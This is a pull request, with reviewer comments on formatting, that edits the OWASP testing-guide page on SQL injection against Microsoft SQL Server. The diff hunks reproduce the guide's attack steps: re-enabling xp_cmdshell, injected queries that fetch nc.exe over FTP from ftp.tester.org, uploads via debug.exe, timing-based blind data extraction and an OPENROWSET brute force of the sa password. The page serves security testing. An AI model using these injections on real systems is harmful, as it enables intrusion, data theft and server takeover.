### PR TITLE
4.8.5.3 - v4 Migration Cleanup

### PR DESCRIPTION
**Pull request by rejahrehim**
This PR part of issue #84

- [ ] This PR handles the issue and requires no additional PRs.
- [x] You have validated the need for this change.

**What did this PR accomplish?**

- Fix links
- Fix linting issues

### CODE REVIEW

File: document/4_Web_Application_Security_Testing/4.8_Input_Validation_Testing/4.8.5.3_Testing_for_SQL_Server.md [hunk 1]
```diff
@@ -1,156 +1,155 @@
...
+## Summary
+
+In this section some [SQL Injection](https://www.owasp.org/index.php/SQL_Injection) techniques that utilize specific features of Microsoft SQL Server will be discussed.
 
 SQL injection vulnerabilities occur whenever input is used in the construction of an SQL query without being adequately constrained or sanitized. The use of dynamic SQL (the construction of SQL queries by concatenation of strings) opens the door to these vulnerabilities. SQL injection allows an attacker to access the SQL servers and execute SQL code under the privileges of the user used to connect to the database.
 
-As explained in [SQL injection](SQL_injection "wikilink"), a SQL-injection exploit requires two things: an entry point and an exploit to enter. Any user-controlled parameter that gets processed by the application might be hiding a vulnerability. This includes:
+As explained in [SQL injection](https://www.owasp.org/index.php/SQL_injection), a SQL-injection exploit requires two things: an entry point and an exploit to enter. Any user-controlled parameter that gets processed by the application might be hiding a vulnerability. This includes:
```
Comment (ThunderSon) [inline document/4_Web_Application_Security_Testing/4.8_Input_Validation_Testing/4.8.5.3_Testing_for_SQL_Server.md]: `an entry point, and an exploit to enter` Oxford comma please before the and

File: document/4_Web_Application_Security_Testing/4.8_Input_Validation_Testing/4.8.5.3_Testing_for_SQL_Server.md [hunk 2]
```diff
@@ -1,156 +1,155 @@
...
-`Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5`\
-`Accept-Language: en-us,en;q=0.5`\
-`Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7`\
-`Keep-Alive: 300`\
-`Proxy-Connection: keep-alive`\
-`Referer: http://vulnerable.web.app/forgotpass.asp`\
-`Content-Type: application/x-www-form-urlencoded`\
-`Content-Length: 50`\
-` email=%27&whichSubmit=submit&submit.x=0&submit.y=0`
+- `POST https://vulnerable.web.app/forgotpass.asp HTTP/1.1`
```
Comment (ThunderSon) [inline document/4_Web_Application_Security_Testing/4.8_Input_Validation_Testing/4.8.5.3_Testing_for_SQL_Server.md]: Put in triple backticks and remove the dashes at the start of each line

File: document/4_Web_Application_Security_Testing/4.8_Input_Validation_Testing/4.8.5.3_Testing_for_SQL_Server.md [hunk 3]
```diff
@@ -1,156 +1,155 @@
...
+- `Content-Type: application/x-www-form-urlencoded`
+- `Content-Length: 50`
+- `email=%27&whichSubmit=submit&submit.x=0&submit.y=0`
 
 The error message obtained when a ' (single quote) character is entered at the email field is:
 
-`Microsoft OLE DB Provider for SQL Server error '80040e14'`\
-`Unclosed quotation mark before the character string '' '.`\
-`/forgotpass.asp, line 15 `
+- `Microsoft OLE DB Provider for SQL Server error '80040e14'`
```
Comment (ThunderSon) [inline document/4_Web_Application_Security_Testing/4.8_Input_Validation_Testing/4.8.5.3_Testing_for_SQL_Server.md]: Triple backticks

File: document/4_Web_Application_Security_Testing/4.8_Input_Validation_Testing/4.8.5.3_Testing_for_SQL_Server.md [hunk 4]
```diff
@@ -1,156 +1,155 @@
...
+On SQL Server 2000:
 
-<!-- -->
+- If `xp_cmdshell` has been disabled with `sp_dropextendedproc`, we can simply inject the following code:
 
-    sp_addextendedproc 'xp_cmdshell','xp_log70.dll'
+`sp_addextendedproc 'xp_cmdshell','xp_log70.dll'`
 
--   If the previous code does not work, it means that the xp\_log70.dll has been moved or deleted. In this case we need to inject the following code:
+- If the previous code does not work, it means that the xp\_log70.dll has been moved or deleted. In this case we need to inject the following code:
```
Comment (ThunderSon) [inline document/4_Web_Application_Security_Testing/4.8_Input_Validation_Testing/4.8.5.3_Testing_for_SQL_Server.md]: put `xp_log70.dll` like that. In between ticks and remove the `\`

File: document/4_Web_Application_Security_Testing/4.8_Input_Validation_Testing/4.8.5.3_Testing_for_SQL_Server.md [hunk 5]
```diff
@@ -162,96 +161,100 @@ Allows the execution of arbitrary SQL Code. The same happens with the User-Agent
...
+Once we can use `xp_cmdshell` (either the native one or a custom one), we can easily upload executables on the target DB Server. A very common choice is netcat.exe, but any trojan will be useful here. If the target is allowed to start FTP connections to the tester's machine, all that is needed is to inject the following queries:
 
-    exec master..xp_cmdshell 'echo open ftp.tester.org > ftpscript.txt';--
-    exec master..xp_cmdshell 'echo USER >> ftpscript.txt';-- 
-    exec master..xp_cmdshell 'echo PASS >> ftpscript.txt';--
-    exec master..xp_cmdshell 'echo bin >> ftpscript.txt';--
-    exec master..xp_cmdshell 'echo get nc.exe >> ftpscript.txt';--
-    exec master..xp_cmdshell 'echo quit >> ftpscript.txt';--
-    exec master..xp_cmdshell 'ftp -s:ftpscript.txt';--
+- `exec master..xp_cmdshell 'echo open ftp.tester.org > ftpscript.txt';--`
```
Comment (ThunderSon) [inline document/4_Web_Application_Security_Testing/4.8_Input_Validation_Testing/4.8.5.3_Testing_for_SQL_Server.md]: triple backticks

File: document/4_Web_Application_Security_Testing/4.8_Input_Validation_Testing/4.8.5.3_Testing_for_SQL_Server.md [hunk 6]
```diff
@@ -162,96 +161,100 @@ Allows the execution of arbitrary SQL Code. The same happens with the User-Agent
...
 
 At this point, nc.exe will be uploaded and available.\
 If FTP is not allowed by the firewall, we have a workaround that exploits the Windows debugger, debug.exe, that is installed by default in all Windows machines. Debug.exe is scriptable and is able to create an executable by executing an appropriate script file. What we need to do is to convert the executable into a debug script (which is a 100% ASCII file), upload it line by line and finally call debug.exe on it. There are several tools that create such debug files (e.g.: makescr.exe by Ollie Whitehouse and dbgtool.exe by toolcrypt.org). The queries to inject will therefore be the following:
 
-    exec master..xp_cmdshell 'echo [debug script line #1 of n] > debugscript.txt';--
-    exec master..xp_cmdshell 'echo [debug script line #2 of n] >> debugscript.txt';--
-    ....
-    exec master..xp_cmdshell 'echo [debug script line #n of n] >> debugscript.txt';--
-    exec master..xp_cmdshell 'debug.exe < debugscript.txt';--
+```sql
```
Comment (ThunderSon) [inline document/4_Web_Application_Security_Testing/4.8_Input_Validation_Testing/4.8.5.3_Testing_for_SQL_Server.md]: triple backticks

File: document/4_Web_Application_Security_Testing/4.8_Input_Validation_Testing/4.8.5.3_Testing_for_SQL_Server.md [hunk 7]
```diff
@@ -162,96 +161,100 @@ Allows the execution of arbitrary SQL Code. The same happens with the User-Agent
...
+- `exec master..xp_cmdshell 'echo open ftp.tester.org > ftpscript.txt';--`
+- `exec master..xp_cmdshell 'echo USER >> ftpscript.txt';--`
+- `exec master..xp_cmdshell 'echo PASS >> ftpscript.txt';--`
+- `exec master..xp_cmdshell 'echo bin >> ftpscript.txt';--`
+- `exec master..xp_cmdshell 'echo get nc.exe >> ftpscript.txt';--`
+- `exec master..xp_cmdshell 'echo quit >> ftpscript.txt';--`
+- `exec master..xp_cmdshell 'ftp -s:ftpscript.txt';--`
 
 At this point, nc.exe will be uploaded and available.\
 If FTP is not allowed by the firewall, we have a workaround that exploits the Windows debugger, debug.exe, that is installed by default in all Windows machines. Debug.exe is scriptable and is able to create an executable by executing an appropriate script file. What we need to do is to convert the executable into a debug script (which is a 100% ASCII file), upload it line by line and finally call debug.exe on it. There are several tools that create such debug files (e.g.: makescr.exe by Ollie Whitehouse and dbgtool.exe by toolcrypt.org). The queries to inject will therefore be the following:
```
Comment (ThunderSon) [inline document/4_Web_Application_Security_Testing/4.8_Input_Validation_Testing/4.8.5.3_Testing_for_SQL_Server.md]: handle .exes and the website

File: document/4_Web_Application_Security_Testing/4.8_Input_Validation_Testing/4.8.5.3_Testing_for_SQL_Server.md [hunk 8]
```diff
@@ -162,96 +161,100 @@ Allows the execution of arbitrary SQL Code. The same happens with the User-Agent
...
 
-`  select * from books where title=`**`text`` ``entered`` ``by`` ``the`` ``user`**
+```sql
+select * from books where title="text entered by the user"
+```
 
-then the penetration tester might enter the text: **'Bomba' OR 1=1-** and if data is not properly validated, the query will go through and return the whole list of books. This is evidence that there is a SQL injection vulnerability. The penetration tester might later *play* with the queries in order to assess the criticality of this vulnerability.
+then the penetration tester might enter the text: `'Bomba' OR 1=1-` and if data is not properly validated, the query will go through and return the whole list of books. This is evidence that there is a SQL injection vulnerability. The penetration tester might later `play` with the queries in order to assess the criticality of this vulnerability.
 
 #### If more than one error message is displayed
```
Comment (ThunderSon) [inline document/4_Web_Application_Security_Testing/4.8_Input_Validation_Testing/4.8.5.3_Testing_for_SQL_Server.md]: Should this be changed to `Multiple Error Messages Displayed`? @kingthorin

File: document/4_Web_Application_Security_Testing/4.8_Input_Validation_Testing/4.8.5.3_Testing_for_SQL_Server.md [hunk 9]
```diff
@@ -162,96 +161,100 @@ Allows the execution of arbitrary SQL Code. The same happens with the User-Agent
...
 
-Depending on the time that the query takes to return, we will know the answer. In fact, what we have here is two things: a **SQL injection vulnerability** and a **covert channel** that allows the penetration tester to get 1 bit of information for each query. Hence, using several queries (as many queries as bits in the required information) the pen tester can get any data that is in the database. Look at the following query
+Depending on the time that the query takes to return, we will know the answer. In fact, what we have here is two things: a `SQL injection vulnerability` and a `covert channel` that allows the penetration tester to get 1 bit of information for each query. Hence, using several queries (as many queries as bits in the required information) the pen tester can get any data that is in the database. Look at the following query
 
-`declare @s varchar(8000)`\
-`declare @i int`\
-`select @s = db_name()`\
-`select @i = [some value]`\
-`if (select len(@s)) < @i waitfor delay '0:0:5'`
+- `declare @s varchar(8000)`
```
Comment (ThunderSon) [inline document/4_Web_Application_Security_Testing/4.8_Input_Validation_Testing/4.8.5.3_Testing_for_SQL_Server.md]: Triple backticks

File: document/4_Web_Application_Security_Testing/4.8_Input_Validation_Testing/4.8.5.3_Testing_for_SQL_Server.md [hunk 10]
```diff
@@ -162,96 +161,100 @@ Allows the execution of arbitrary SQL Code. The same happens with the User-Agent
...
 This query will wait for 5 seconds if bit '@bit' of byte '@byte' of the name of the current database is 1, and will return at once if it is 0. Nesting two cycles (one for @byte and one for @bit) we will we able to extract the whole piece of information.
 
-However, it might happen that the command *waitfor* is not available (e.g., because it is filtered by an IPS/web application firewall). This doesn't mean that blind SQL injection attacks cannot be done, as the pen tester should only come up with any time consuming operation that is not filtered. For example
+However, it might happen that the command `waitfor` is not available (e.g., because it is filtered by an IPS/web application firewall). This doesn't mean that blind SQL injection attacks cannot be done, as the pen tester should only come up with any time consuming operation that is not filtered. For example
 
-`declare @i int select @i = 0`\
-`while @i < 0xaffff begin`\
-`select @i = @i + 1`\
-`end`
+- `declare @i int select @i = 0`
```
Comment (ThunderSon) [inline document/4_Web_Application_Security_Testing/4.8_Input_Validation_Testing/4.8.5.3_Testing_for_SQL_Server.md]: Triple backticks

**Comment by rejahrehim** [comment]
@ThunderSon Fixed all. Please check

File: document/4_Web_Application_Security_Testing/4.8_Input_Validation_Testing/4.8.5.3_Testing_for_SQL_Server.md [hunk 11]
```diff
@@ -1,311 +1,317 @@
...
+Not all is lost when the web application does not return any information --such as descriptive error messages (cf. [Blind SQL Injection](https://www.owasp.org/index.php/Blind_SQL_Injection)). For example, it might happen that one has access to the source code (e.g., because the web application is based on an open source software). Then, the pen tester can exploit all the SQL injection vulnerabilities discovered offline in the web application. Although an IPS might stop some of these attacks, the best way would be to proceed as follows: develop and test the attacks in a testbed created for that purpose, and then execute these attacks against the web application being tested.
 
 Other options for out of band attacks are described in Sample 4 above.
```
Comment (ThunderSon) [inline document/4_Web_Application_Security_Testing/4.8_Input_Validation_Testing/4.8.5.3_Testing_for_SQL_Server.md]: Can you possibly link the sample being discussed?

File: document/4_Web_Application_Security_Testing/4.8_Input_Validation_Testing/4.8.5.3_Testing_for_SQL_Server.md [hunk 12]
```diff
@@ -1,311 +1,317 @@
...
+select @i = [some value]
+if (select len(@s)) < @i waitfor delay '0:0:5'
+```
 
-Measuring the response time and using different values for @i, we can deduce the length of the name of the current database, and then start to extract the name itself with the following query:
+Measuring the response time and using different values for `@i`, we can deduce the length of the name of the current database, and then start to extract the name itself with the following query:
 
 `if (ascii(substring(@s, @byte, 1)) & ( power(2, @bit))) > 0 waitfor delay '0:0:5'`
 
 This query will wait for 5 seconds if bit '@bit' of byte '@byte' of the name of the current database is 1, and will return at once if it is 0. Nesting two cycles (one for @byte and one for @bit) we will we able to extract the whole piece of information.
```
Comment (ThunderSon) [inline document/4_Web_Application_Security_Testing/4.8_Input_Validation_Testing/4.8.5.3_Testing_for_SQL_Server.md]: set all occurrences of @bit and @byte in backticks, and not in single quotes.

File: document/4_Web_Application_Security_Testing/4.8_Input_Validation_Testing/4.8.5.3_Testing_for_SQL_Server.md [hunk 13]
```diff
@@ -1,311 +1,317 @@
...
 
-`declare @i int select @i = 0`\
-`while @i < 0xaffff begin`\
-`select @i = @i + 1`\
-`end`
+```sql
+declare @i int select @i = 0
+while @i < 0xaffff begin
+select @i = @i + 1
+end`
```
Comment (ThunderSon) [inline document/4_Web_Application_Security_Testing/4.8_Input_Validation_Testing/4.8.5.3_Testing_for_SQL_Server.md]: There is a loose \`

File: document/4_Web_Application_Security_Testing/4.8_Input_Validation_Testing/4.8.5.3_Testing_for_SQL_Server.md [hunk 14]
```diff
@@ -1,311 +1,317 @@
...
+```
 
-#### Checking for version and vulnerabilities
+#### Checking for Version and Vulnerabilities
 
 The same timing approach can be used also to understand which version of SQL Server we are dealing with. Of course we will leverage the built-in @@version variable. Consider the following query:
```
Comment (ThunderSon) [inline document/4_Web_Application_Security_Testing/4.8_Input_Validation_Testing/4.8.5.3_Testing_for_SQL_Server.md]: set the version variable in backticks

File: document/4_Web_Application_Security_Testing/4.8_Input_Validation_Testing/4.8.5.3_Testing_for_SQL_Server.md [hunk 15]
```diff
@@ -1,311 +1,317 @@
...
 On SQL Server 2005, it will return something like the following:
 
-`Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) Oct 14 2005 00:33:37 `<snip>
+`Microsoft SQL Server 2005 - 9.00.1399.06 (Intel X86) Oct 14 2005 00:33:37`
 
 The '2005' part of the string spans from the 22nd to the 25th character. Therefore, one query to inject can be the following:
 
 `if substring((select @@version),25,1) = 5 waitfor delay '0:0:5'`
 
 Such query will wait 5 seconds if the 25th character of the @@version variable is '5', showing us that we are dealing with a SQL Server 2005. If the query returns immediately, we are probably dealing with SQL Server 2000, and another similar query will help to clear all doubts.
```
Comment (ThunderSon) [inline document/4_Web_Application_Security_Testing/4.8_Input_Validation_Testing/4.8.5.3_Testing_for_SQL_Server.md]: Same here for the version variable

File: document/4_Web_Application_Security_Testing/4.8_Input_Validation_Testing/4.8.5.3_Testing_for_SQL_Server.md [hunk 16]
```diff
@@ -1,311 +1,317 @@
...
 
-### Example 9: bruteforce of sysadmin password
+### Example 9: Bruteforce of Sysadmin Password
 
 To bruteforce the sysadmin password, we can leverage the fact that OPENROWSET needs proper credentials to successfully perform the connection and that such a connection can be also “looped” to the local DB Server. Combining these features with an inferenced injection based on response timing, we can inject the following code:
```
Comment (ThunderSon) [inline document/4_Web_Application_Security_Testing/4.8_Input_Validation_Testing/4.8.5.3_Testing_for_SQL_Server.md]: OPENROWSET in backticks

File: document/4_Web_Application_Security_Testing/4.8_Input_Validation_Testing/4.8.5.3_Testing_for_SQL_Server.md [hunk 17]
```diff
@@ -1,311 +1,317 @@
...
+What we do here is to attempt a connection to the local database (specified by the empty field after `SQLOLEDB`) using `sa` and `<pwd>` as credentials. If the password is correct and the connection is successful, the query is executed, making the DB wait for 5 seconds (and also returning a value, since OPENROWSET expects at least one column). Fetching the candidate passwords from a wordlist and measuring the time needed for each connection, we can attempt to guess the correct password. In “Data-mining with SQL Injection and Inference”, David Litchfield pushes this technique even further, by injecting a piece of code in order to bruteforce the sysadmin password using the CPU resources of the DB Server itself.
 
 Once we have the sysadmin password, we have two choices:
 
--   Inject all following queries using OPENROWSET, in order to use sysadmin privileges
-
-<!-- -->
-
--   Add our current user to the sysadmin group using sp\_addsrvrolemember. The current user name can be extracted using inferenced injection against the variable system\_user.
+- Inject all following queries using OPENROWSET, in order to use sysadmin privileges
```
Comment (ThunderSon) [inline document/4_Web_Application_Security_Testing/4.8_Input_Validation_Testing/4.8.5.3_Testing_for_SQL_Server.md]: Same here

File: document/4_Web_Application_Security_Testing/4.8_Input_Validation_Testing/4.8.5.3_Testing_for_SQL_Server.md (hunk 8 above)
Comment (ThunderSon) [reply document/4_Web_Application_Security_Testing/4.8_Input_Validation_Testing/4.8.5.3_Testing_for_SQL_Server.md]: @kingthorin a small reminder ❤️

**Comment by ThunderSon** [comment]
@rejahrehim please make sure to put all files in backticks as well. You can search for `.exe` across the file, and `.dll`

**Comment by rejahrehim** [comment]
All fixed @ThunderSon

File: document/4_Web_Application_Security_Testing/4.8_Input_Validation_Testing/4.8.5.3_Testing_for_SQL_Server.md (hunk 8 above)
Comment (kingthorin) [reply document/4_Web_Application_Security_Testing/4.8_Input_Validation_Testing/4.8.5.3_Testing_for_SQL_Server.md]: Yes, headings should use title case.
This seems to have been addressed in b02bf50, so I'll resolve this conversation.

**Pull request merged**